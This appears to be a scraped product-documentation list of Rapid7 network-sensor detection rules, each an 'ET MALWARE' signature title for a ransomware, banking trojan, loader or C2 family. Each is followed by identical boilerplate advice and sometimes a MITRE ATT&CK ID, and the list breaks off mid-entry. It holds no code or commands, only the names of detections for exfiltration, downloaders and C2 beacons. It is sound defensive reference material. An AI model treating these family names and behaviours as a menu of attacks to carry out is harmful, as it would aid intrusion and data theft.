Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Donut Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE [PTsecurity] Fake SSL Certificate Observed (Google)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Fake SSL Certificate Observed (Oracle America)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Fake SSL Certificate Observed (Oracle canada)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Fake SSL Certificate Observed (Yahoo)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Gozi/Ursnif Payload v12

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Gozi/Ursnif Payload v14

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] JS.Trojan-Downloader.Nemucod.yo HTTP POST (:Exec:)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Kraken Ransomware Start Activity 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE [PTsecurity] Kuriyama Loader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] MSIL/Biskvit.A Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Paradise Ransomware Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE [PTsecurity] Possible Backdoor.Win32.TeamBot / RTM C2 Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Possible Cobalt Strike payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Possible Malicious (HTA-VBS-PowerShell) obfuscated command

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Possible Trojan.Downloader UserAgent (binary_getter)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] PS/TrojanDownloader.Agent.NNR XORed Zip payload (key 0x91)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Tinba (Banking Trojan) HTTP Header

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Tinba Checkin 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Trickbot Data Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Trojan.Downloader VBA Script obfuscation (binary_getter)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Trojan.JS.Agent.dwz Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Trojan.JS.Agent.dwz Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] TR/Spy.Banker.agdtw Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Ursnif Encoded Payload Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] W32/Rodecap.StealRat C2 Payload (GIF)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] WeChat (Ransomware/Stealer) HttpHeader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE [PTsecurity] Win32/Ramnit Stage 0 Communicating with CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/Randrew!rfn CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/SocStealer.Socelars C2 Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/Spy.Agent.PMJ (MICROPSIA)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/SpyAgent.Raptor (realtime-spy) CnC activity 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/SpyAgent.Raptor (realtime-spy) CnC activity 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/Spy.RTM/Redaman IP Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/TinyNuke Payload ACF40 Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pult Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PunkeyPOS HTTP CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon 9

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon Fake UA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Punto Loader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Request M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Request M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Server Response M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Server Response M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Server Response M3

Description

Recommendation

ET MALWARE PurpleFox Backdoor/Rootkit Download Server Response M4

Description

Recommendation

ET MALWARE PurpleFox EK Landing Page Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pushdo.S CnC response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pushdo Update URL Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Putter Panda HTTPClient CnC HTTP Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PWSteal.Bancos Generic Banker Trojan SCR Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PWS.Win32/Daceluw.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PXJ Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Py/Beapy CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Py/MechaFlounder CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Python/PBot Browser Hijacker Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Python.Ragua Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Qarallax RAT Downloading Modules

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Qtloader encrypted check-in Oct 19 M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Quant Loader Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Quant Loader Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Quant Loader Download Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Quant Loader Download Response M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Qudox CnC Actiivty

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture GET 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture GET 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture GET 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture GET 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture POST 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture POST 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture POST 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture POST 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Report GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Report POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ragnarok Ransomware CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Ragnarok Ransomware CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE RampantKitten APT TelB Python Variant - CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RampantKitten APT TelB Python Variant - CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ranscam Ransomware Contact Form

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE RansomCrypt Getting Template

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RansomCrypt Intial Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ransomware.Hidden-Tear Variant CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Ransomware Locky CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Locky CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Locky CnC Beacon 21 May

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Locky CnC Beacon 4 21 May

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Win32/WinPlock.A CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Win32/WinPlock.A CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransomware Win32/WinPlock.A Successfully Installed CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ransom.Win32.Birele.gsg Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Razy Variant Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RCtrl Backdoor CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RDP Brute Force Bot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Reborn Stealer 2021 Exfil attempt via Telegram

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE rechnung zip file download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RedLeaves HOGFISH APT Implant CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red Leaves HTTP CnC Beacon (APT10 implant)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE RedLine - GetArguments Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/dllhost/ac

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/ms/check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/ms/flush

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/nt/sk

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/nt/th

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/win/cab

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Red October/Win32.Digitalia Checkin cgi-bin/win/wcx

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReflectiveGnome Download Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RegHelper Installation

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RegSubsDat Checkin

Description

